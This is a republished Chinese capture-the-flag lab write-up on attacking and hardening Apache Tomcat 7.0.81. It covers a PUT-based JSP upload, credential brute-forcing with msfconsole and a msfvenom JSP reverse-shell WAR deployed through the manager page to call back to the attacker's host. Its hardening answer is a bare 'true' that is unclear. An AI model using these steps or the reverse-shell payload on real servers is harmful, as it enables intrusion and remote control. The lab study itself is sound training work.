ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

tomcat中间件安全与加固

2022-06-20 01:31:59  阅读:167  来源: 互联网

标签:tomcat 中间件 flag bm1 提交 加固 root war


任务三:tomcat中间件安全与加固

任务环境说明:
ü 服务器场景名称:w-win7
ü 服务器场景用户名:administrator;密码:未知(开放链接)
ü 渗透机场景:kali
ü 渗透机用户名:root,密码:toor
1. 通过渗透机场景kali中的工具对web服务器进行扫描,浏览web服务器网页,在首页中找到tomcat服务版本号,并将其版本号作为flag提交;

Apache Tomcat/7.0.81

2. 已知此版本的tomcat具有上传漏洞,即向页面提交发送请求就会生成对应的文件。利用Burp Suite工具进行抓包,向网站首页位置提交内容为<%out.print(“hello”);%>文件名字为good.jsp的请求。将Burp Suite中的PUT请求作为flag提交(注:flag长度为16个单位长度);

PUT /good.jsp/
PUT%20/good.jsp/

3. 通过msfconsole工具使用root目录下的的password.txt文件进行tomcat后台账户密码的破解,并将账户密码作为flag提交。(flag格式:账户_密码);

root:root

4. 用kali中的分离工具查看root目录下bm1.war文件中的flag文件,并将flag文件内容作为提交;

bm1.war文件能压缩
binwalk -e bm1.war

5. 通过第3题中的账户密码登陆网页(格式为服务器IP:8080/manager/html),将kali中root目录下的bm1.war文件上传后连接(连接地址为IP:8080/bm1/index.jsp)。在服务器中查找flag.txt文件,并将其内容作为flag提交;

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.147.129 LPORT=5555 -f war -o bm1.war
生成一个马 然后再本地开5555端口 然后部署上传

点击就能执行 把shell反弹回来

windows: cd c:
dir "flag.txt" /s /b

linux: find / -name "flag.txt"

6. 修改tomcat配置文件内容,使tomcat可以抵御第2题中的漏洞,将修改内容作为flag提交;

true

标签:tomcat,中间件,flag,bm1,提交,加固,root,war
来源: https://www.cnblogs.com/eXn5/p/16391963.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有